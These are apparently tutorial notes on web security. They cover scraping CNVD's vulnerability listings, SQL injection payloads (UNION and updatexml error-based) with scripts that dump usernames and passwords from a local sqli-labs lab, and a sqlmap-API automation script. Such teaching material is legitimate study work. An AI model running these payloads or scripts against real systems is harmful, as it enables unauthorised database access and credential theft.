Fetch the site's vulnerability list for "CMS"
Open Burp Suite
Open the page to crawl (the CMS search-results page)
Turn on Intercept and reload the page
Click through a few next-page links and watch Burp Suite
The captured raw POST request looks like this:
POST /flaw/list.htm?flag=true HTTP/1.1
Host: www.cnvd.org.cn
Connection: close
Content-Length: 385
Cache-Control: max-age=0
Origin: https://www.cnvd.org.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset=
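Outside Burp, the same request can be replayed with the requests library. A minimal sketch, assuming fresh cookie values (the site sits behind a JS challenge, so the __jsl_clearance / JSESSIONID values above expire quickly); only the form fields that matter for the search are spelled out, the rest mirror the raw body:
# Replay the captured POST; 'offset' drives the pagination (20 rows per page).
import requests

url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
                  '(KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',
    'Referer': 'https://www.cnvd.org.cn/flaw/list.htm?flag=true',
    # Paste fresh cookie values captured from the browser here:
    'Cookie': '__jsluid_s=...; __jsl_clearance=...; JSESSIONID=...',
}
data = {'keyword': 'CMS', 'condition': '1', 'flag': 'true', 'max': '20', 'offset': '0'}
resp = requests.post(url, headers=headers, data=data)
print(resp.status_code)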
Inspect the page source for patterns
Use a regular expression to match the href attribute of the <a> tags
Get the full vulnerability list from the first page
Loop to fetch the first six pages of results (offsets 0-100 in steps of 20, matching the loop below)
# -*-coding:utf-8-*-
import hackhttp
from bs4 import BeautifulSoup as BS
import re

def CMS(raw):
    url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
    hh = hackhttp.hackhttp()
    code, head, html, redirect_url, log = hh.http(url=url, raw=raw)
    # print code
    # print html
    soup = BS(html, 'lxml')
    # each entry is an <a> tag whose href points at /flaw/show/CNVD-...
    BUGS = soup.find_all(name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
    for BUG in BUGS:
        print BUG['title']
raw_start = '''
POST /flaw/list.htm?flag=true HTTP/1.1
Host: www.cnvd.org.cn
Connection: close
Content-Length: 385
Cache-Control: max-age=0
Origin: https://www.cnvd.org.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset='''
# Offsets 0, 20, ..., 100: one page of 20 entries per iteration
for pages_count in range(0, 101, 20):
    raw = raw_start + str(pages_count)
    # print raw
    CMS(raw)
SQL injection tutorial by example
SQL injection
Numeric injection
1 or 1=1 -- 1
1 or 1=1 #
String injection
1' or 1=1 -- 1
1' or 1=1 #
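To see why the extra quote is needed in the second case, here is a minimal sketch of how each payload completes a query built by naive string concatenation (the query templates are illustrative, not from any real application):
# Numeric context: the input lands in the SQL unquoted.
payload = "1 or 1=1 -- 1"
print("SELECT * FROM users WHERE id = %s" % payload)
# -> SELECT * FROM users WHERE id = 1 or 1=1 -- 1

# String context: the leading quote closes the string literal first.
payload = "1' or 1=1 -- 1"
print("SELECT * FROM users WHERE username = '%s'" % payload)
# -> SELECT * FROM users WHERE username = '1' or 1=1 -- 1'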
UNION-based injection
1. Use a UNION query to determine the number of columns (a script automating this probe follows the list)
select id,username from users union select 1,2;
2. Use a UNION query to get the current database name and version
select id,username from users union select database(),version();
3. Use the TABLES table in the built-in information_schema database to list all table names of a given database
select id,username from users where id=-1 union select TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security';
4. Use the COLUMNS table in the built-in information_schema database to get the column names of a given table
select id,username from users where id=-1 union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users';
5. Get the data from the target table
select id,username from users where id=-1 union select id,username from users;
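Step 1 can be automated by growing the UNION column list until MySQL's "different number of columns" error disappears. A sketch against the sqli-labs URL used below, assuming the page echoes query errors:
# Probe the column count: MySQL raises error 1222 until the counts match.
import requests

base = "http://127.0.0.1/sqli/Less-2/?id=100 union select "
for n in range(1, 10):
    cols = ",".join(str(i) for i in range(1, n + 1))
    resp = requests.get(base + cols + " -- 1")
    if "different number of columns" not in resp.text:
        print("column count: %d" % n)
        break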
Get table information
http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1; -- 1
Get column information
http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1; -- 1
Get table data
http://127.0.0.1/sqli/Less-2/?id=100 union select id,username,password from users; -- 1
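Each of these UNION queries returns a single row, so dumping everything means stepping the LIMIT offset. A sketch that walks the table names one by one; the regex pulling the value out of the page is a placeholder that depends on the Less-2 template:
# Walk information_schema.TABLES one row at a time by incrementing LIMIT.
import re
import requests

tpl = ("http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA "
       "from information_schema.TABLES where TABLE_SCHEMA='security' limit %d,1 -- 1")
for n in range(0, 50):
    resp = requests.get(tpl % n)
    m = re.search(r"Your Login name:(\S+)", resp.text)  # placeholder pattern for the page template
    if not m:
        break
    print(m.group(1))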
Error-based injection (function errors)
and updatexml(1,version(),0)#
To display the version string in full, prepend 0x7e (a ~): the argument is then invalid XPath, so the whole value is echoed in the error
and updatexml(1,concat(0x7e,version()),0)
Get table names
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)
ERROR 1242 (21000): Subquery returns more than 1 row
The subquery returns more than one row, so fetch the table names one at a time with LIMIT
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)
Get column names
and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),0)#
Get data
and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#
and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
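The same LIMIT walk works here; each value comes back inside the MySQL error after the ~ (updatexml truncates its output to roughly 32 characters per error). A sketch, with the URL and error regex as assumptions:
# Dump usernames through updatexml() error messages, one row per request.
import re
import requests

tpl = ("http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,"
       "(select username from users limit %d,1)),0) -- 1")
for n in range(0, 50):
    resp = requests.get(tpl % n)
    m = re.search(r"XPATH syntax error: '~([^']*)'", resp.text)
    if not m:
        break
    print(m.group(1))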
For more, see the SQL injection wargame (sqli-labs) walkthrough document
A deeper look at the SQLMAP API
geturl.py
#coding=utf-8
from bs4 import BeautifulSoup
import hackhttp

# 1. Define the url, request it, and get the html content
url = "http://192.168.131.149/sqli/"
hh = hackhttp.hackhttp()
code, head, html, redirect_url, log = hh.http(url)
# 2. Parse the html with the lxml parser
soup = BeautifulSoup(html, "lxml")
# grab the image-map node (note: bs4 spells the class filter class_, since class is a Python keyword)
content = soup.find_all('map', id='fm_imagemap')
print content
# 3. Pull the target links out of the parsed page
for k in soup.find_all('area'):  # each <area> in the image map links to one challenge page
    print(url + k['href'] + '?id=1')  # build a testable URL with an id parameter
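Each URL this prints can be fed straight into the sqlmap() function in autosqli.py below.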
autosqli.py
#coding=utf-8
import requests
import json
import time

logo = "======auto sqli tools====== "
print(logo)

def sqlmap(host):
    urlnew = "http://127.0.0.1:8775/task/new"
    urlscan = "http://127.0.0.1:8775/scan/"
    headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"}
    # Create a new task
    pd = requests.get(url=urlnew, headers=headers)
    print('[*]New task')
    # Read the taskid out of the returned JSON
    jsons = pd.json()
    print("[*]id:", jsons['taskid'])
    print("[*]success:", jsons["success"])
    task_id = jsons['taskid']
    # Build the scan request from the taskid and the target url
    scan = urlscan + task_id + "/start"
    print("[*]scanurl:", scan)
    data = json.dumps({"url": "{}".format(host)})
    headerss = {"Content-Type": "application/json"}
    # Ask the sqlmapapi server to start the scan
    scans = requests.post(url=scan, headers=headerss, data=data)
    # Read back the scan status
    swq = scans.json()
    print('--------scan-----------')
    print('[*]scanid:', swq["engineid"])
    print('[*]scansuccess:', swq["success"])
    print('--------status---------')
    status = "http://127.0.0.1:8775/scan/{}/status".format(task_id)
    print(status)
    # Poll until the scan finishes
    while True:
        ret = requests.get(url=status, headers=headers)
        # status == 'terminated' means the scan is done
        if ret.json()['status'] == 'terminated':
            # Fetch the scan results
            datas = requests.get(url='http://127.0.0.1:8775/scan/{}/data'.format(task_id))
            dat = datas.json()['data']
            print('[*]data:', dat)
            break
        elif ret.json()['status'] == 'running':
            time.sleep(3)  # don't hammer the API while the scan runs

sqlmap("http://192.168.131.149/sqli/Less-1/?id=1")
https://www.freebuf.com/articles/web/204875.html
深入了解SQLMAP API.pdf
Related commands:
python sqlmapapi.py -s    # start the sqlmapapi server
python sqlmapapi.py -c    # start the interactive API client
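The JSON body posted to /scan/<taskid>/start is not limited to url: it also accepts ordinary sqlmap options as keys (option names follow sqlmap's own options; verify against your sqlmap version). A sketch that passes extra options and reads the live log endpoint:
# Start a scan with extra options, then read its log.
import json
import requests

api = "http://127.0.0.1:8775"
task_id = requests.get(api + "/task/new").json()["taskid"]
options = {"url": "http://192.168.131.149/sqli/Less-1/?id=1", "level": 3, "risk": 1}
requests.post(api + "/scan/%s/start" % task_id,
              headers={"Content-Type": "application/json"},
              data=json.dumps(options))
print(requests.get(api + "/scan/%s/log" % task_id).json())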